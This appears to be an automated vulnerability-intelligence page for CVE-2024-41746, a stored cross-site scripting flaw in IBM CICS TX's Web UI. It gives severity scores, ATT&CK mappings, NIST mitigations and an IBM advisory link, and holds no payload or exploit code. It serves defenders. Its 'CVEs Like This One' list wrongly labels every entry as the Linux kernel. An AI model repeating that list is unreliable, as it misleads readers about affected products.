Cyber Resilience

CVE-2024-41746

High

Published: 16 January 2025

Published
16 January 2025
Modified
14 August 2025
KEV Added
Patch
CVSS Score v3.1 7.2 CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
EPSS Score 0.0029 52.6th percentile
Risk Priority 15 60% EPSS · 20% KEV · 20% CVSS

Summary

CVE-2024-41746 is a high-severity Cross-site Scripting (CWE-79) vulnerability in Ibm Cics Tx. Its CVSS base score is 7.2 (High).

Operationally, exploitation aligns with the MITRE ATT&CK technique Exploit Public-Facing Application (T1190); ranked in the top 47.4% of CVEs by exploit likelihood; it is not currently listed in the CISA KEV catalog.

The strongest mitigations our analysis identified are NIST 800-53 SI-10 (Information Input Validation) and SI-15 (Information Output Filtering).

Deeper analysis

CVE-2024-41746 is a stored cross-site scripting vulnerability (CWE-79) in IBM CICS TX Advanced versions 10.1 and 11.1, as well as Standard 11.1. The issue affects the Web UI, enabling users to embed arbitrary JavaScript code that alters the intended functionality and can potentially lead to credentials disclosure within a trusted session. Published on 2025-01-16, it carries a CVSS v3.1 base score of 7.2 (AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N).

Unauthenticated attackers can exploit this vulnerability remotely over the network with low attack complexity and no user interaction or privileges required. Successful exploitation allows injection of malicious JavaScript into the Web UI, which executes in the context of trusted users' sessions, potentially enabling theft of credentials or other sensitive data.

IBM has issued a security advisory with details on the vulnerability and mitigation at https://www.ibm.com/support/pages/node/7171873.

EU & UK References

Vulnerability details

IBM CICS TX Advanced 10.1, 11.1, and Standard 11.1 is vulnerable to stored cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a…

more

trusted session.

CWE(s)

Related Threats

MITRE ATT&CK Enterprise TechniquesAI

T1190 Exploit Public-Facing Application Initial Access
Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network.
T1185 Browser Session Hijacking Collection
Adversaries may take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify user-behaviors, and intercept information as part of various browser session hijacking techniques.
T1539 Steal Web Session Cookie Credential Access
An adversary may steal web application or service session cookies and use them to gain access to web applications or Internet services as an authenticated user without needing credentials.
Why these techniques?

Stored XSS in public web UI directly enables remote exploitation (T1190) and facilitates browser session hijacking or web session cookie theft for credential access.

Confidence: HIGH · MITRE ATT&CK Enterprise v18.1

CVEs Like This One

CVE-2025-13214Same product: Linux Linux Kernel
CVE-2024-43178Same product: Linux Linux Kernel
CVE-2025-13723Same product: Linux Linux Kernel
CVE-2025-36253Same product: Linux Linux Kernel
CVE-2024-41742Same product: Linux Linux Kernel
CVE-2025-33088Same product: Linux Linux Kernel
CVE-2025-13718Same product: Linux Linux Kernel
CVE-2025-13219Same product: Linux Linux Kernel
CVE-2024-51476Same product: Linux Linux Kernel
CVE-2024-41743Same product: Linux Linux Kernel

Affected Assets

ibm
cics tx
10.1, 11.1.0.0

Mitigating Controls

Mitigating Controls (NIST 800-53 r5) AI

prevent

Directly prevents stored XSS exploitation by requiring filtering and encoding of Web UI outputs containing user-supplied data to block JavaScript execution.

prevent

Prevents injection of malicious JavaScript into the Web UI by validating and sanitizing all information inputs before storage.

prevent

Mitigates the specific stored XSS flaw in IBM CICS TX by requiring timely flaw remediation through patching as per the IBM advisory.

References